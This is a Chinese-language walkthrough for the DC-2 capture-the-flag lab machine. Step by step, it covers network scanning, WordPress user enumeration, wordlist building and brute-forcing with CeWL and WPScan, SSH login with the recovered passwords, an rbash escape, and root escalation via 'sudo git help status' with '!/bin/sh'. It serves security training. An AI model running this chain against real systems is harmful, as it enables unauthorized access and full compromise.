DC-2通关详解

一．DC2环境

1.先去下载DC2靶机，下载地：https://download.vulnhub.com/dc/DC-2.zip

2.我们的实验环境依旧是kali虚拟机

二．DC2通关

1。首先打开虚拟机进行，信息收集

DC1和DC2前几步差不多，我们同样不知道DC2的IP地址利用ifconfig查看自己的虚拟机ip

-sP是只扫描在线的主机，不扫描端口nmap -sP 192.168.211.0/24（每个人的IP都不相同）

2.收集信息，查看端口和服务

-A所有信息（系统版本有哪些端口等等）

-v他会给出扫描过程中的详细信息 -p指定地址或端口

nmap -A -p- -v 192.168.***.***（后两位是DC2的IP同样每人不相同）

发现开放了80端口，存在web服务，Apache/2.4.10

发现开放了7744端口，存在ssh服务，OpenSSH 6.7p1

3.访问web站点（DC2的ip）

192.168.***.***（这里是你们DC2的ip）

发现找不到网页，而且我们输入的ip自动转化成了域名，我们想到dc-2这个域名解析失败，我们需要更改hosts文件，添加一个ip域名指明方向。

修改hosts文件，添加我们dc2的IP为域名dc-2指明方向

Vin /etc/hosts

添加完成后

退出：w q（：可以进行代码w保存q退出，如不可以用那加一个（！）强制执行）

再次进行访问，访问成功

发现这是一个WordPress的站点

4.发现flag1

Flag1:

Your usual wordlists probably won't work,so instead,maybe you just need to be cewl.

More passwords is always better,but sometimes you just can't win them all.

Log in as one to see the next flag. If you can't find it,log in as another

 你通常的单词表可能行作用，所以，也许你只需要cewl。 多输入密码总是更好的，但有时你就是不能赢得所有的密码。 以一个身份登录以查看下一个标志。如果你找不到它，那就以另一个人的身份登录吧

大概就是暴力破解账号密码

5.做一个目录扫描

dirb http://dc-2/

发现疑似后台地址

打开进入到登入页面

发现多遍，但没有什么

6.用户名枚举

前面我们提到这是一个wordpress的站，我们采用专门针对wordpress的工具wpscan来进行扫描

WPScan是Kali Linux默认自带的一款漏洞扫描工具，它采用Ruby编写，能够扫描WordPress网站中的多种安全漏洞，其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞，并且支持最新版本的WordPress。值得注意的是，它不仅能够扫描类似robots.txt这样的敏感文件，而且还能够检测当前已启用的插件和其他功能该扫描器可以实现获取站点用户名，获取安装的所有插件、主题，以及存在漏洞的插件、主题，并提供漏洞信息。同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码。

wpscan一些常用语句

wpscan --url http://dc-2（启动wpscan）

wpscan --url http://dc-2 --enumerate t（扫描主题）

wpscan --url http://dc-2 --enumerate p（扫描插件）

wpscan --url http://dc-2 --enumerate u（枚举用户）

这里我们扫描wordpress的版本

这里我们得知wordpress的版本为4.7.10

进入登录页面进行登录

输入用户名密码，提示用户不存在，但似乎可以进行用户枚举

我们先来进行用户枚举，在去尝试用枚举到的用户进行爆破密码

wpscan --url http://dc-2 --enumerate u（用户枚举）

出了三个用户

admin jerry tom

7.暴力破解账号密码

cewl http://dc-2/ -w dict.txt  或者 cewl http://dc-2/ > 1.txt

Cat dc2.txt（查看）

使用wpscan进行暴力破解

wpscan --url http://dc-2 --passwords dc2.txt（破解账户密码）

jerry（账号）adipiscing（密码）

tom（账号）parturient（密码）

jerry/adipiscing进行登录

tom/parturient进行登录

8.发现flag2

登录之后，我们发现flag2，我这里登的是jerry

打开flag2

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

如果你不能利用WordPress并采取一条捷径，还有另外一种方法。

希望你找到了另一个入口。

9.在tom的目录里发现flag3

jerry/adipiscing

tom/parturient

登录ssh

ssh tom@192.168.211.130 -p 7744

这里需要密码parturient（注意这里密码是不显示的）我这里就输错了一次

Ls（查看）

在tom里发现flag3.txt

Cat用不了

发现只有less和vi可以查看

接下来，尝试rbash绕过详情参考 https://xz.aliyun.com/t/7642

查看可以使用的命令

echo $PATH（查看路径）

cd进不去 用ls查看

使用echo来绕过rbash

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

echo /*

10.在jerry的家目录发现flag4

Cd ..（进入根目录）

Ls（查看）

Cd jerry（进入jerry目录）

Ls（查看）

发现flag4

cat flag4.txt（进行查看）

Good to see that you've made it this far - but you " re not home yet .

很高兴看到你走了这么远，但你还没回家。

You still need to get the final flag (the only flag that really counts!!! ).

您仍然需要获得最后的标志(唯一真正重要的标志！)

No hints here 一you're on your own now. :- )

这里没有暗示，一，你现在只能靠自己了。*-)

Go on

继续

git outta here!!!!

大概就是还没有结束。猜测需要提权才能获取到最终的flag，并且flag4 提示我们可以使用git，我们可以通过git来提权

    使用tom无权限运行sudo 我们切换到jerry

我们看到无需root权限，jerry 可以使用 git

sudo -l

11.提权

查看一下可以使用的root权限命令

find / -user root -perm -4000 -print 2>/dev/null

jerry用户也不行直接sudo su

sudo su

使用git命令进行提取

sudo git help status

!/bin/sh，直接输入就行

提权成功

发现root权限

12.发现final-flag.txt

cd /root（进入root权限）

Ls（查看）

发现final-flag.txt

cat final-flag.txt（进行查看）

Congratulatons!!!

A special thanks to all those who sent me tweets

and provided me with feedback - it's all greatly

appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

恭喜你！!! 特别感谢所有给我发推特的人 并给我提供了反馈——这一切都非常重要 感激 如果你喜欢这个CTF，请通过@DCAU7给我发一条推特。

大致意思就是你已经通关了（dc2就到这里了，大家拜拜）